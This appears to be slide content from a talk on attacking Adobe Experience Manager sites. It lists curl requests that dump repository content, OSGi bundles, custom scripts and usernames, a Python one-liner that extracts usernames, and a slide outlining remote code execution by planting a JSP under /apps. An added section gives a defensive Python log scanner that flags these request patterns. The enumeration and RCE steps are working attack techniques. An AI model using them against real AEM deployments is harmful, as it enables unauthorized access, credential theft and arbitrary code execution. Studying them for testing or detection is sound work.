The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.
4. What do we want
• Sensitive information from JCR
• Installed OSGi bundles
• Custom scripts
• Usernames
• Password hashes
• Elements that allow anonymous modification
5. Sensitive information from JCR
• Use JsonRendererServlet
curl -X "GET" http://127.0.0.1:8080/.json
curl -X "GET" http://127.0.0.1:8080/.6.json
curl -X "GET" http://127.0.0.1:8080/.tidy.6.json
curl -X "GET" http://127.0.0.1:8080/.tidy.infinity.json
6. Installed OSGi bundles
• List of all bundles
• QueryBuilder is your friend!
http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
curl -X "GET" http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X "GET" http://127.0.0.1:8080/bin/querybuilder.json
7. Custom scripts
• List custom scripts
• List compiled custom scripts from cache
curl -X "GET" http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X "GET" http://127.0.0.1:8080/var/classes.tidy.infinity.json
8. Usernames
• Dump content node properties
• Use regular expression to extract usernames (pipe with prev command)
curl -X "GET" http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print("\n".join([m.group(1) for m in re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])]))' |
sort -u
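Added example, not part of the original slides: the requests on slides 5 to 8 share the Sling selector pattern `[.tidy][.<depth>|.infinity].json`, so a defender can flag them in a web access log. The log lines are constructed, the combined log format is an assumption, and `classify` and `scan` are hypothetical names.

```python
import re
from urllib.parse import urlsplit

# Client IP, request line and status from a combined-format access log entry (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Sling JSON rendering selectors seen on the slides: [.tidy][.<depth>|.infinity].json
SELECTOR_RE = re.compile(r'^(?P<node>.*?)(?P<tidy>\.tidy)?(?:\.(?P<depth>\d+|infinity))?\.json$', re.I)


def classify(target):
    """Return a reason string if the request looks like a JCR dump, else None."""
    path = urlsplit(target).path  # drop any query string
    if path.startswith("/bin/querybuilder.json"):
        return "querybuilder"
    m = SELECTOR_RE.match(path)
    if not m:
        return None
    if m.group("depth"):
        # An explicit depth selector asks for a recursive dump of the subtree.
        return "recursive-dump depth=" + m.group("depth").lower()
    if m.group("node") in ("", "/"):
        return "root-json"  # JSON rendering of the repository root
    return None  # plain <node>.json is common in normal traffic; heuristic choice


def scan(lines):
    """Return (ip, target, status, reason) for each flagged GET request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        reason = classify(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("target"), int(m.group("status")), reason))
    return hits


# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/May/2015:21:20:01 +0300] "GET /.tidy.infinity.json HTTP/1.1" 200 48211',
    '192.0.2.10 - - [03/May/2015:21:20:05 +0300] "GET /bin/querybuilder.json HTTP/1.1" 200 9120',
    '192.0.2.10 - - [03/May/2015:21:20:09 +0300] "GET /apps.tidy.infinity.json HTTP/1.1" 404 312',
    '198.51.100.7 - - [03/May/2015:21:21:00 +0300] "GET /content/site/en.html HTTP/1.1" 200 15322',
    '198.51.100.7 - - [03/May/2015:21:21:02 +0300] "GET /content/dam/site/teaser.json HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, target, status, reason in scan(SAMPLE_LOG):
        print(f"{ip} {status} {reason:30} {target}")
```

A 200 status on a flagged request means the JSON rendering was actually served to the client, so that path is the one to restrict first.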
16. Remote code execution
• We have node – http://127.0.0.1:8080/rce
• We have script exec.jsp that is magically loaded into node – http://127.0.0.1:8080/apps/rcetype
• When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}